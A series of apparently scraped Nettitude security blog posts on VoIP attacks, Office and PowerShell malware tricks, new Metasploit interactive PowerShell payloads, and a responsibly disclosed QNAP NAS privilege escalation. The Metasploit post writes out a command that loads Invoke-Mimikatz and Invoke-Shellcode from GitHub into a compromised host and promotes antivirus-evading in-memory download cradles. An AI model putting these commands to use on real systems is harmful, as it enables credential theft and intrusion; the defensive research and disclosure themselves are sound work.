VoIP attacks are on the rise, particularly in the UK, according to new research by Nettitude

Voice over IP (VoIP) infrastructure has become more susceptible to cyber attacks in recent years due to the proliferation of both its use and the tools that can be used for malicious purposes. During the first quarter of 2015, our security researchers have observed a large amount of VoIP attacks worldwide; however, the majority were against UK servers.

Our researchers found that VoIP attacks often started just a few minutes after a new server went live. Worryingly, they also identified that 88 percent of VoIP attacks took place outside of regular working hours, when there would typically be no security staff present to monitor the situation.

Nettitude has released the findings of this research in full, detailing the key findings and explaining the tools and techniques that are being used by today’s VoIP attackers.

To download a copy of the report, please click here.

 

To contact Nettitude editor, please email media@nettitude.com.

Malware Is Changing Daily! Are You Still Protected?

A look at recent malware techniques

One of the biggest challenges in detecting and protecting against malware is that attackers continually change their techniques and behaviours. We have observed some interesting activities recently that are worth discussing in more detail.

Office macro security bypass 

Traditionally, when malware is embedded into Microsoft Office documents, it will require the user to activate macros.  In essence, if a computer user inadvertently opens a malicious document, the warning message to enable macros can be a red warning flag to users to instantly close the document. However, recently analysed malware embedded within Microsoft Office documents has adapted its technique.

Once the document is open, the user is presented with a blank page asking them to click on the button to download the content of the page. Once the user clicks on the button, they are then presented with another message box asking them to open the document which will then run the macro.

Figure 1 - Malware bypassing macro activation

Figure 1 – Malware bypassing macro activation

Further curiosity on the button “Display the content of the document” reveals that the author has embedded an object that can be accessed without the macro being enabled. In this case, the object was a visual basic (vb) script.

The analysis of this script revealed some interesting tricks used to bypass windows default security settings within PowerShell. The script uses a PowerShell ExecutionPolicy bypass. This will be explained in the next section.

Figure 2 - Office document with a vbs script as embedded object - the user does not need to enable macro

Figure 2 – Office document with a vbs script as embedded object – the user does not need to enable macro

PowerShell ExecutionPolicy bypass – no profile 

There is no doubt that the number of people who know about PowerShell is very limited within the end user community. Unless you are into some computer administration or scripting programming language or hacking/penetration testing, you are most likely not to be aware of PowerShell. Powershell is however installed in all recent versions of Microsoft Operating Systems by default.

Windows PowerShell extends the command line in new and exciting ways. It opens access to some of the operating system functions in ways that were previously possible only with extensive programming. For example, you can not only get the name of a particular user, but also retrieve the entire related user object. You can then manipulate the properties of this user object by referring to the properties you want to work with by name.

Windows PowerShell also has a non-interactive processing mode, which is used when executing a series of commands. In non-interactive processing mode, PowerShell reads and executes commands one by one but doesn’t present a prompt to the user. This aspect is what the malware is making use of in this case.  Using the non-interactive mode, the commands are executed without the knowledge of the user. In this scenario, the malware is bypassing the execution policy.

The execution policy is part of the security strategy of Windows PowerShell. It determines whether you can load configuration files (including your Windows PowerShell profile) and run scripts, and it determines which scripts, if any, must be digitally signed before they will run. However, using the “– Bypass”, nothing is blocked and there are no warnings or prompts. This feature was not however intended to block malware – sadly.

An effective way to reduce the risk of being compromised by malware such as this is to whitelist the applications that are allowed to run on a computer system. It is however true that the malicious user could have achieved their objective by using other methods. Hence, the targeted system will be better protected if the user does not download from untrusted sources or open unknown/unexpected documents from which the sender cannot be verified.

The figure below shows the vb script that was downloaded from the office document. As per the reference in the image, line 2 contains the instruction that will execute the malicious command. Line 2 was disabled and line 3 was created to display the malicious command instead.

Figure 3 - malware exploiting Microsoft Powershell

Figure 3 – malware exploiting Microsoft Powershell

Malware using a known port to hide their traffic: really? 

Protecting against malware that uses port 80 is generally difficult. However, it is possible to control what applications run on a certain port number. For instance, we have an instance of the Dradix malware running on port 8443.

Even though port 8443 is an official alternative of port 443, it would be easy to narrow down what applications use that port.  The ‘netstat’ command when executed as a privilege user can reveal if the port is open and which applications (process id) are currently connecting to that port.

Figure 4 - Quick command to determine which port is open and list connected applications

Figure 4 – Quick command to determine which port is open and list connected applications

The example below show Dradix malware configured to use port 8443.

Figure 5 - Extract from Dradix malware sample showing port 8443

Figure 5 – Extract from Dradix malware sample showing port 8443

Whitelisting the applications that are allowed to use certain ports could help in identifying malicious traffic.

Fake voicemail: double extension

On a different note, another strand of malware has been recently observed that is using an old trick. The malware will disguise itself as a voicemail.  The trick used here is the double extension. The malware appears to be a .wav but in fact it’s a .wav.exe

It is very common to have a voicemail. Also, by curiosity, it would be very easy to think “what’s the worst that can happen if I listen to this message”.

Figure 6 - Malware sample using double extension - fake voicemail

Figure 6 – Malware sample using double extension – fake voicemail

As seen in the above image, the file will look like a voicemail (audio file) but it’s not an audio file. As seen in the red box, the pretended voicemail is in fact an application.  The Golden rule remains valid: Do not trust unknown attachments or links. If you do not expect an attachment, contact the sender when appropriate. If it’s obvious that it’s malware, the best option would be to delete the fake voicemail.  In any doubt, it would better to delete the file. Like the saying goes, if it is important, they will call back.

The same technique could be used to target WhatsApp, Viber, Skype and any other social messenger that allows voice communications. For instance, people can be targeted with an email suggesting that they have received a voicemail from their friend in WhatsApp, Viber or Skype just to name a few. Fake voicemail is a really good technique that can be used during big events such as the elections (just around the corner in the UK at the time of writing!). Users can be tricked into listening to voicemail or a recording of secret conversations from politicians!

It is not, however, uncommon to have telephone services, especially voice over IP telephone services, which offer voicemail by email. Before trying to listen to a message that in fact does not exist, it is very important to verify the origin of the voicemail.

Conclusion

Malware is continually evolving. 24/7 effective monitoring is key in protecting from malware. This can be achieved with our Threat2Alert service https://www.threat2alert.com/. Nettitude can also provide expert research and deep dive investigations into malicious activity within your organisation.

It is also important to have an incident response procedure in place.  Effective security needs to be reviewed and updated based on the threat information available. Having knowledge of the current threats, malware behaviours and techniques will help determine the best security strategy to implement.

 

 

To contact Nettitude’s editor, please email media@nettitude.com.

 

Loading A Weaponised Interactive PowerShell Session With Metasploit

PowerShell is rapidly becoming the go to post exploitation method for hackers, with a plethora of awesome PowerShell tools such as PowerSploit, PowerUp, PowerView and Nishang, to name a few. The standard PowerShell environment can be quickly extended into a hacker’s delight.

These ‘tools’ are written entirely in PowerShell and do not touch disk (largely) – therefore they are anti-virus (AV) friendly and do not involve risky process injections. However, it has not all been plain sailing – achieving a remote interactive PowerShell session (without the use of PSRemoteing or WinRM) has often been an inconvenience. As security professionals, here at Nettitude we are keen to solve this issue. At present, Metasploit offers some post PowerShell modules to execute scripts or standalone tools, but there is nothing like having an interactive shell.

Enter the new Interactive PowerShell payloads for Metasploit written by Nettitude consultants, Ben Turner (@benpturner) and Dave Hardy (@davehardy20).

These payloads offer the ability to have an interactive PowerShell session on an already compromised host, via the windows/local/payload_inject module (see Figure 1).

Figure 1 - Reverse session using new Interactive Powershell payload

Figure 1 – Reverse session using new Interactive Powershell payload

Alternatively, you can use the new payloads as a replacement for the normal Metasploit payloads, such as windows/meterpreter/reverse_tcp when using PSEXEC for example (See Figure 2).

Figure 2 - Executing powershell_bind_tcp through PSEXEC.

Figure 2 – Executing powershell_bind_tcp through PSEXEC.

The payloads provide not just an interactive PowerShell session, but can be remotely ‘weaponised’ with the modules of your choosing (i.e. PowerSploit, PowerTools). Just set the LOAD_MODULES option within the payload with a comma-separated string of a web server or local network location where the modules are hosted – handy if you don’t have Internet access.

For example, if you are lucky enough to have Internet access from your target, you can use the GitHub repositories directly like so:

Set LOAD_MODULES https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1,https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke–Shellcode.ps1,………..

Figure 3 - Fully weaponised PowerShell session

Figure 3 – Fully weaponised PowerShell session

As you can see in Figure 3, we now have an interactive PowerShell session in Metasploit and the console reports that it has loaded ten modules.

In total, there are actually four new Interactive PowerShell payloads, two that work for the processes above and two more that will work with msfvenom, or the generate option within msfconsole, which create standalone bind and reverse payloads that can be uploaded and executed separately (see Figure 4).

Figure 4 - Generating a powerShell_reverse_tcp payload

Figure 4 – Generating a powerShell_reverse_tcp payload

But we know the burning question is…’does mimikatz work this way?’…Well, yes it does. As with all things mimikatz you need to get hold of some SYSTEM privs somehow (but it’s Windows, so no dramas there). Then run the excellent PowerSploit ‘invoke-mimikatz’ commandlet in your newly weaponsied PowerShell session and BOOM! (Kudos to @JosephBialek, @gentilkiwi and @mattifestation for making this module a reality!)

Figure 5 - Mimikatz over PowerShell interactive Metasploit session

Figure 5 – Mimikatz over PowerShell interactive Metasploit session

The rest really is up to you!

“So where do I get this awesomeness?”
The PowerShell payloads are in the main Metasploit tree, so all you need to do is get the latest and greatest Metasploit Framework git version including commit – https://github.com/rapid7/metasploit-framework/pull/5194

Or if you are looking for the standalone scripts they are available here – https://github.com/nettitude/powershell

Happy hunting.

Background

Looking for something a bit more local or don’t have Metasploit? Read on!

As an extra to the Metasploit payloads and also to give some background to the work behind the module, we are publishing the initial scripts that were developed to ‘weaponise’ a standard windows PowerShell session. The PowerShell scripts were first used as Proof of Concept and early Metasploit modules.

These are essentially just loops that read the remote GitHub repository of PowerSploit, PowerView and PowerUp and use the PowerShell ‘download cradle’ method or ‘local’ web server version to retrieve the PowerShell modules (useful when there is no Internet access).

The scripts are as follows;

  • In-memory-downloader.ps1 – downloads and installs the modules into memory, no AV stress
  • Local-in-memory-downloader.ps1 – the local network version of the above, although this requires a local web server
  • Powersploit-downloader.ps1 – this script and the corresponding Powertools-downloader.ps1 download to disk and installs the modules. These are for systems with no Anti-Virus (which doesn’t detect the modules). Another reason for this method is that some of these tools will not run fully just in memory.

The scripts themselves are easy to use just copy and paste the download cradle command into an active PowerShell session (see Figure 6) on which the ‘in-memory-downloader.ps1’ script has been run.

Figure 6 - Executing in-memory-downloader.ps1

Figure 6 – Executing in-memory-downloader.ps1

Future Development

We will look to include SSL support for the payloads and hopefully create additional POST modules that work with the new Metasploit PowerShell session. Currently, we have not developed any at this time, as the integration of these modules was reliant on the new session type being integrated into Metasploit. As this has now been completed and approved in the core Metasploit framework we can start development for these modules.

 

 

To contact Nettitude’s editor, please email media@nettitude.com.

 

QNAP NAS – Remote Unauthenticated User to Admin Shell: Part 2

tl;dr

A number of security vulnerabilities have been identified in two applications hosted on the QNAP App Center. When combined it is possible for a remote unauthenticated user to gain interactive remote administrative access and take full control of the device.

Introduction

In the previous blog post, it was shown that the Logitech Media Server (7.7.2) App suffers from Shellshock. The situation is further aggravated by the developer’s decision not to implement the chroot configuration option.  However, the account that the application runs under and thus the Bash commands are executed under, does not have root/administrative permissions.

The ultimate objective of exploit development is to gain a root/administrative remote shell, thus leaving no room for debate on the seriousness of the issue. The system has been completely exploited and is under the full control of the attacker. End of story, no debate. With this in mind, I began to examine the system to identify a means to execute a reverse-shell and gain privileged credentials.

Vulnerability 1 – Weak Folder Permissions iStat 0.5.7

The iStat application is used to monitor system resource utilisation. The user is free to decide what is monitored and to what level. The data is displayed via a web interface that is hosted on the device’s main web server. It is accessed via http://<ip_address>/istat/login.php.

A traditional or bind shell instructs a machine to open a command shell, present it on a port and wait for inbound connections. Thus granting a user or for that matter an attacker, interactive access. However, with the widespread adoption of firewalls their effectiveness has become somewhat limited, as inbound connections are highly controlled. In contrast, a reverse shell rather than waiting for an incoming connection, actively connects back to a machine. As firewalls are typically much more permissive of outbound connections, reverse shells have become dominant.

A bind or reverse shell can be written in pretty much any language. If coded in a language that can be executed by a web-server (e.g. ASP, ASP.NET, PHP, etc.) and providing that an attacker can write to a suitable location, the shell will be spawned and access granted. By recursively searching the file-system we can see that iStat has weak folder permissions. Everyone, including the ssods/Logitech Media Server account has the ability to read/write/execute (see Figure 1).

Figure 1 – Everyone RWX directory served by Apache

 

This folder is served by the application’s web server and will thus execute a suitably coded reverse-shell.

Vulnerability 2 – Web Server Runs With Administrative Permissions

iStat is hosted on an Apache instance. It runs under an account called httpdusr, which is a member of the Administrators group. Thus when a reverse-shell is executed, it grants the attacker administrative access to the device (see Figure 2).

Vulnerability 2 – Web Server Runs With Administrative Permissions

Summary

iStat 0.5.7 hosted on the QNAP App Center suffers from several security issues. They do not grant remote unauthenticated access. However, once an attacker gains limited access they can be leveraged to obtain administrative privileges. The sixteen thousand customers who have downloaded it should uninstall it immediately.

In conclusion, this two-part blog illustrates a pattern we see in many contemporary attacks. Multiple vulnerabilities, mistakes, and weaknesses chained together to achieve full exploitation (see Figure 3). If any one of them is missing an attacker fails to get administrative access. If the chain can be formed its game over and the attacker wins.

Figure 3 - kill chain

The release of this information has followed the responsible disclosure model. All research has been forwarded to QNAP and the date of disclosure mutually agreed. CERT has been informed and is tracking this issue.

Timeline

  • Logitech Media Center Shellshock vulnerability discovery on 08/02/2015
  • QNAP informed via website on 11/02/2015
  • SSOTS/SSODS author contacted 12/02/2015. No response to date
  • Reported to cert.org on 12/02/2015
  • Confirmed against latest firmware and ARM plus x86 devices on 16/02/2015
  • Local privilege elevation discovery on 22/02/2015
  • QNAP contacted via facebook.com on 05/03/2015
  • Proof of concept completed on 06/03/2015
  • Contacted by QNAP Security. Research forwarded and disclosure date agreed on 07/03/2015
  • Vulnerability disclosed on 06/04/2015

References

 

 

To contact Nettitude’s editor, please email media@nettitude.com.